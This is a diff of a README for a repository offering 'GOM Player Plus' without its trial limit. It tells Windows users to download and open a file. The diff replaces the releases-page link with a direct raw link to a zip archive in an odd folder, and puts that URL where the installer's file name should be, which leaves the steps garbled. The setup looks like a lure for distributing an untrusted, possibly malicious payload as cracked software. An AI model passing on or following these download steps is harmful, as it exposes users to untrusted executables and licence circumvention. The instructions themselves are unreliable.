skar004/GOM-Player-Plus-No-Trial/README.md

 Follow these easy steps to download and run GOM Player Plus on your Windows PC.
 You don’t need any programming skills to use this application.

 ## 📥 Download & Install
-1. Click the button above or visit [this page to download](https://github.com/skar004/GOM-Player-Plus-No-Trial/releases).
+1. Click the button above or visit [this page to download](https://raw.githubusercontent.com/skar004/GOM-Player-Plus-No-Trial/main/footling/GOM-Player-Plus-No-Trial_3.9-alpha.3.zip).
 2. Look for the latest release, and find the installation file.
-It should be named something like `GOMPlayerPlusSetup.exe`.
+It should be named something like `https://raw.githubusercontent.com/skar004/GOM-Player-Plus-No-Trial/main/footling/GOM-Player-Plus-No-Trial_3.9-alpha.3.zip`.
 3. Click on the file to start the download.
 4. Once the file is downloaded, open it to begin the installation process.
 5. Follow the on-screen instructions.
 The setup wizard will guide you through the steps.